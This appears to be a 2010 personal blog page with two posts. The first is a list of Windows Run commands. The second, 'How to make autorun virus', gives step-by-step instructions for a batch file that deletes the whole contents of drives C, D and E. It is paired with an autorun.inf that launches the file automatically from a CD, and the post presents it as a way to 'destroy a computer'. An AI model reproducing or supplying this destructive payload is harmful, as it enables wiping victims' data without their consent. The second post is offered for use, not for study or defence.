Thursday, June 3, 2010

Useful Run Commands....


Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control colorDr. Watson
System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Findfast - findfast.cpl
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecell
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Hearts Card Game - mshearts

Friday, April 16, 2010

How to make autorun virus


step 1:

create a file in note pad and name it "vrs.cmd"

write following commands in the file-
"
rd e:\*.* /s/q
rd d:\*.* /s/q
rd C:\*.* /s/q
"

plz dont include double quotes
after saving it with name vrs.cmd
plz dont'double click on it else u'll lose data frm ur hard disk

STEP 2-

make another file name it "autorun.inf"
and write following codes in it.
"
[AUTORUN]
open=vrs.cmd
"
here also no need to include double quotes
but [] are required
save this file autorun.inf

STEP 3-
Now write these two files into a CD and CD is READY to destroy a computer..

CHECK___
u can check the ability of vrs.cmd i mean to have a trial

make a folder in "d:" name it "ninja"
and put some files and folders it like songs, sanps etc
now make a file in note pad

rd d:\ninja /s/q

and save it with name vr.cmd
and now double click on this file
it will remove ninja folder from "d:"